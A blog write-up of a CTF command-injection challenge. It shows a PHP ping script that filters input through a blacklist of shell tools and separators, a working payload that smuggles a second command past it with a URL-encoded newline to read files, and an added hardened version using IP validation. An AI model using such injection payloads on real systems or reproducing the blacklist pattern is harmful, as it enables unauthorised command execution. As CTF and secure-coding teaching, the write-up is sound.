醉梦半醒's Blog

Remote Command Injection

2018/07/23

A challenge a member of a CTF group posted: http://45.124.115.155:8003/a74a15c5fb626077/

ls, cat and the like are all filtered; reading ping.php itself with more (http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php) shows why:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms
::::::::::::::
ping.php
::::::::::::::
 'sbsbbsb',
        ';' => 'sb',
        '|' => 'sb',
        '-'  => 'sb',
        '$'  => 'sb',
        '('  => 'sb',
        ')'  => 'sb',
        '`'  => 'sb',
        '||' => 'sb',
        '<>' => 'sb',
        'bash' => 'sb',
        '>' => 'sb',
        'wget' => 'sb',
        'cat' => '',
        'cd' => 'sb',
        '../' => 'sb',
        '/' => 'sb',
        'rm' => 'sb',
        '>>' => 'sb',
        'echo' => 'sb',
        'curl' => 'sb',
        'dd' => 'sb',
    );

// Remove any of the characters in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// var_dump($target);
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    // Windows
    $cmd = shell_exec( 'ping  ' . $target );
}
else {
    // *nix
    $cmd = shell_exec( 'ping  -c 1 ' . $target );
}

// Feedback for the end user
echo  "{$cmd}";


%0a is a URL-encoded newline. The blacklist above strips ';', '|', '$', backticks and the other separators it lists, but a newline is not in the table, so it reaches shell_exec untouched and the shell treats whatever follows it as a second command.

more reads the file (the bit of ops work I learned back then still comes in handy).

Payload: http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php
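As an added example (not the challenge's code or the author's), here is how the same ping.php can be rewritten so that no blacklist is needed: the parameter is accepted only if the whole string is an IP address, and is shell-escaped on top of that. The function names validate_ping_target and build_ping_command are assumed for this example.

```php
<?php
// Added example, not the challenge's ping.php: allow-list validation instead of a
// substitution blacklist. A newline, a space, a second command or a path can never
// reach the shell, because anything that is not a bare IP address is rejected.

function validate_ping_target(string $input): ?string
{
    // filter_var() validates the entire string, so "127.0.0.1\nmore ping.php"
    // returns false. Nothing is stripped or rewritten, so there is nothing to bypass.
    $ip = filter_var($input, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

function build_ping_command(string $ip): string
{
    // Same OS check as the original script; only the argument handling changes.
    $windows = stristr(php_uname('s'), 'Windows NT') !== false;
    $count = $windows ? '-n 1' : '-c 1';
    // escapeshellarg() is defence in depth: the value is already a validated IP.
    return 'ping ' . $count . ' ' . escapeshellarg($ip);
}

$target = validate_ping_target($_GET['ip'] ?? '');
if ($target === null) {
    http_response_code(400);
    exit("invalid ip\n");
}

header('Content-Type: text/plain');
// Feedback for the end user, as in the original, but with a validated argument.
echo shell_exec(build_ping_command($target));
```

With this version the request ip=127.0.0.1%0Amore%20flag_is_here.php is answered with HTTP 400 before any command is built, and a log entry for rejected values gives the defender a usable detection signal.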
